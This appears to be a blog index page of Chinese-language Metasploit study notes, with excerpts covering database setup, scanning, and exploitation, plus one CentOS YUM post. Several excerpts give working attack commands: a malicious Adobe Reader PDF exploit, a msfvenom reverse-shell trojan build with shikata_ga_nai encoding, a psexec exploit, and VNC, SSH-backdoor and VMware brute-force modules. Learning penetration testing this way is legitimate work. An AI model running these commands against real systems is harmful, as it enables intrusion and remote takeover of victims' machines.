1. MSF学习笔记09

    利用adobe reader漏洞执行payload 构造pdf文件 ``` msf > use exploit/windows/fileformat/adobe_utilprintf msf exploit(adobe_utilprintf) > set payload windows/meterpreter/reverse_tcp msf exploit(adobe_utilprintf) > set lhost 1.1.1.1 msf exploit(adobe_utilprintf) > exploit

    2019/07/26 Security

  2. MSF学习笔记08

    payload 生成 windows 执行payload生成 msfvenom --payload-options -p windows/shell/reverse_tcp ##查看需要配置的options msfvenom -a x86 --platform windows -p windows/shell/reverse_tcp LHOST=1.1.1.1 LPORT=4444 -b "\x00" -e x86/shikata_ga_nai -i 9 -f exe -o 1.exe ##生成1.exe反弹木马 启用handler侦听 msfconsole use exploit/multi/handler set payload windows/shell/reverse_tcp set LHOST 1.1.1.1 set LPORT 4444 exploit

    2019/07/26 Security

  3. MSF学习笔记07

    msf弱点扫描模块使用

    2019/07/26 Security

  4. MSF学习笔记06

    MSF WEB应用扫描器

    2019/07/26 Security

  5. MSF学习笔记05

    MSF弱点扫描 vnc密码破解 use auxiliary/scanner/vnc/vnc_login vnc无密码访问 use auxiliary/scanner/vnc/vnc_none_auth RDP远程桌面漏洞 use auxiliary/scanner/rdp/ms12_020_check 设备后门 use auxiliary/scanner/ssh/juniper_backdoor use auxiliary/scanner/ssh/fortinet_backdoor VMWARE ESXI 暴力破解 use auxiliary/scanner/vmware/vmauthd_login use auxiliary/scanner/vmware/vmware_enum_vms 利用WEB API 远程开启虚拟机 use auxiliary/admin/vmware/poweron_vm

    2019/07/26 Security

  6. MSF学习笔记04

    MSF信息收集 nmap扫描 db_nmap -sV 192.168.1.1 auxiliary扫描模块 RHOSTS <>RHOST 192.168.1.1-24 192.168.1.1/24 files:/root/ip.txt arp扫描 msf > use auxiliary/scanner/discovery/arp_sweep set INTERFACE ̵ RHOSTS̵ SHOST̵ SMAC̵ THREADSҔ run

    2019/07/26 Security

  7. MSF学习笔记03

    meterpreter 高级、动态、可扩展的Payload

    2019/07/26 Security

  8. MSF学习笔记02

    exploit分类 Active exploit 示例: msf > use exploit/windows/smb/psexec msf exploit(psexec) > set rhost 192.168.1.100 rhost => 192.168.1.100 msf exploit(psexec) > set payload windows/shell/reverse_tcp payload => windows/shell/reverse_tcp msf exploit(psexec) > set lhost 192.168.1.1 lhost => 192.168.1.1 msf exploit(psexec) > set lport 4444 lport => 4444 msf exploit(psexec) > set smbuser user1 #需要客户机账户名 smbuser => user1 msf exploit(psexec) > set smbpass pass1 #需要客户机密码 smbpass => pass1 msf exploit(psexec) > exploit

    2019/07/26 Security

  9. MSF学习笔记01

    msf数据库链接 root@kali:~# msfdb reinit ##数据库重建 root@kali:~# msfdb init ##数据库链接 root@kali:~# service postgresql start ##启动pgsql数据库(5432接口未启动状态【netstat -pantu | grep 5432】) root@kali:~# msfdb start ##启动msfdb msf > db_status ##查看链接状态 msf > db_rebuild_cache ##重建cache msf > db_connect -y /var/lib/pgsql/.msf4/database.yml #手动链接数据库配置文件(已经建立数据库完成的情况) NMAP扫描 msf > db_nmap 172.16.1.1 ##NMAP扫描并导入数据库 msf > hosts ##查询扫描主机结果 msf > services ##查看扫描到的端口信息 host port proto name state info ---- ---- ----- ---- ----- ---- 查询结果 msf > creds ##显示暴力破解结果 msf > vulns ##显示扫描漏洞结果 msf > loot ##查看hash结果

    2019/07/25 Security

  10. CentOS 7 本地YUM仓库搭建

    本地YUM仓库搭建 序号|修改人|版本|时间|备注 –|–|–|–|– Minggle v1.0 2019.6.28 新建

    2019/07/24 CentOS